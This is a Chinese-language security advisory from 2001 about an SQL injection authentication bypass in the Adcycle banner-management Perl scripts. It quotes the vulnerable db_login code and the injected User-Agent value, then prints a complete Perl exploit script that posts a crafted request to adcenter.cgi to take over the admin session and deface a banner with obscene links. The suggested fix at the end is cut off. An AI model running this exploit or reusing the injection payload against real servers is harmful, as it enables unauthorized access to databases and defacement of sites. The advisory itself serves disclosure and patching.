Adcycle AdLibrary.pm 非法会话访问漏洞
发布日期:2001-02-26
更新日期:2001-02-26
受影响系统:
描述:
Adcycle.com Adcycle 0.78b
Adcycle.com Adcycle 0.77
- Linux
- Sun Solaris
- OpenBSD
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
- HP-UX
BUGTRAQ ID: 2393
CVE(CAN) ID: CAN-2001-0425
Adcycle是Adcycle.com开发的一套perl脚本,主要使用来管理banner,后台使用MySQL
数据库。
它存在一个安全问题,可能导致恶意用户绕过用户认证过程对数据库进行操作。
问题处在下列代码中:
AdLibrary.pm:
sub db_login() {
==>
if($verify==0){
$FOUND=0;
$sth = $dbh->prepare("SELECT * FROM login WHERE remote='$remote' && agent='$agent' ORDER BY stime DESC");
$sth->execute;
while(@login = $sth->fetchrow_array){
if(length($login[1])>1){
$verify=1;
$whoami=$login[1];
$pid=$mixer;
}
}
$sth->finish();
}
<==
}
如果用户设置agent为:
$agent = Mozilla' || aid='ADMIN
则就可能获取ADMIN用户的所有记录。(如果此时ADMIN用户已经登录的话)
利用其他cgi程序,攻击者也可能删除数据库记录。
<* 来源:Neil K (neilk@alldas.de) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Neil K (neilk@alldas.de)提供了如下演示代码:
#!/usr/bin/perl
#
#Adcycle v0.78b eXploit
#by neilk@alldas.de
#
#This script exploits a situation that allows a remote user to 'skip'
#authentication if the legitimate Admin is logged in or has not logged
#out properly since their last session.
#
#Shoutz to: tribunal, domz, all @alldas.de, mjm @gmc-online.de
# code segments borrowed from teleh0r @doglover.com
#
#http://news.alldas.de.
#
use strict;
use Socket;
banner();
if (@ARGV < 1) {
usage();
exit(1);
}
(my $target) = @ARGV;
my $clickurl="http://www.fuqu.com";
my $dir="cgi-bin/adcycle";
my $imageurl="http://www.hornylesbians.com/pr0n.gif";
my $cid="MT01";
my $bannerid=1;
my $agent = "Mozilla'||aid='ADMIN";
my $url = "click=$clickurl&image=$imageurl&pri=0&change=Update Banner 1 Profile&option=AUT
O&border=1&align=CENTER&target=_blank&alt=h0h0h0h0&btext= 22verdana" size=2>Click Here to Visit our Sponsor 3E&html= %
3Ccenter> 3Fmanager=adcycle.com&cid=$cid&b=1&id=IDNUMBER" target="_top%
22>
%
3Cstrong>antionlinesuxhard <%
2Fcenter> %
0A&null= 3Dadcycle.com&cid=$cid&b=1&id=IDNUMBER"%
3E&task=update_banner_profile&cid=$cid&banner=$bannerid&pg=2";
my $url_length = length($url);
my $request=
"POST /$dir/adcenter.cgi HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $url_length
$url
";
my $iaddr = inet_aton($target);
my $paddr = sockaddr_in(80, $iaddr);
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, 'tcp');
connect(SOCKET, $paddr);
send(SOCKET,"$request", 0);
close(SOCKET);
exit(1);
sub banner {
print "\nAdcycle eXploit for V0.77b/0.78b\n";
print "by Neilk (neilk\@alldas.de/neil\@alldas.de)\n";
print "http://www.alldas.de\n\n";
}
sub usage {
print "Usage:\tperl $0 <target ip>\n\n";
}
建议:
临时解决方法:
NSFOCUS建议您按照漏洞发现者所提供的临时解决方法来修改脚本:
AdLibrary.pm:
sub db_login {
=>
my $agent=$env->get_agent;
while($agent =~ s/'// !=0 ){}
my $cookie=$env->get_cookie;
my $datestamp=$env->get_datestamp;
my $admin_user_name=$config->get_admin_user_name;
=>
if($verify==0){
my($trash,$mycookname,$mycookpid)=split(/\!\!/,$cookie);
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
